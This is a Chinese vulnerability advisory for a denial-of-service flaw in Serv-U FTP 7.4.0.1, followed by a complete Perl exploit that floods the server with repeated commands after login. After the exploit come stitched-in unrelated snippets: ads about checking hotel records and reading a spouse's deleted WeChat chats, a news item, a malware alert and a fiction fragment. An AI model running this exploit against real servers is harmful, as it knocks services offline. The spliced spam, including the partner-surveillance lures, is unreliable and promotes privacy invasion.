影响版本:
RhinoSoft Serv-U 7.4.0.1
漏洞描述:
BUGTRAQ ID: 34127
Serv-U FTP是一款FTP服务程序。
如果远程攻击者向Serv-U FTP服务器发送特制 *** NT请求的话,就可以导致服务器停止响应。<*参考
Jonathan Salwan (submit@shell-storm.org)
*>
SEBUG安全建议:
厂商补丁:
RhinoSoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.serv-u.com/
测试 *** :
[www.sebug.net]
本站提供程序( *** )可能带有攻击性,仅供安全研究与教学之用,风险自负!
#!/usr/bin/perl
# Soft : FTP Serv-U
# Version : v7.4.0.1
#
# Denial of Service in Serv-u up to 7.4.0.1 (no crash)
# Just the server is saturated, it stops responding.
#
# Author: Jonathan Salwan
# Mail: submit [AT] shell-storm.org
# Web: http://www.shell-storm.org
use IO::Socket;
print "[+] Author : Jonathan Salwan \n";
print "[+] Soft: FTP Serv-U\n";
if (@ARGV < 3)
{
print "[*] Usage: <serv-u.pl> <host> <port>\n";
print "[*] Exemple: serv-u.pl 127.0.0.1 21 jonathan toto\n";
exit;
}
$ip = $ARGV[0];
$port = $ARGV[1];
$user = $ARGV[2];
$pass = $ARGV[3];
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";
print "\n[+] Connecting: Ok!\n";
print "[+] Sending request...\n";
$evil = " *** NT\r\n" x 300000;
$after = "\x2A\x2A";
print $socket "USER $user\r\n";
print $socket "PASS $pass.$after\r\n";
print $socket "$evil";
sleep(1);
close($socket);
print "[+]Done! the server is saturated.\n";
有时在我们的工作或日常课堂上会接触到大大小小的圈子,有时这些圈子会给我们带来很大的祝福,但也有很多圈子,尽量不要接触得更好。 查开宾馆记录,真的可以在网上查到吗 1.有时,圆圈后面的人一旦联系上就...
怎么查看我老公删除的微信聊天记录(如何查看对方微信聊天记录 面对现在的高房价,许多人对于楼市都持观望态度,但是开发商却依旧没有停下开发的脚步,民众的购买力虽然下降了,但是我国的房子却还是越建越多,富...
为推动咸宁市纺织产品质量提升,进一步提高相关实验室的检验能力和水平,湖北省纤检局咸宁分局组织全市10家纱线生产企业开展产品质量检验比对活动,并于9月24日召开纱线质量比对数据分析会。 分析会上...
近日,多个企业反馈大量主机和服务存在卡顿和蓝屏现象,在寻求深信服协助后,使用EDR进行全网扫描发现大量主机感染了相同的病毒。深信服安全团队研究发现,该企业用户中的是最新型的WannaMine变种,之前...
“外面怪热的,你进来凉快一下吧。” “嫂子,我不是故意的,我今天在山上采了好多野果子,想过来送给你吃,然后就……” 看着王铁柱那有些不知所措的样子,钱小菊便知道怎么一回事了,只是当她的目光看向王铁...
大家现在都意识到手机安全的重要性,手机都设置了开机密码,可能有的朋友前一天设置了开机密码,第二天起床后把密码给忘记了,折腾了大半天,拿到手机店,遇到黑心的老板,会黑掉你几百块,那个心疼呀不能言喻。...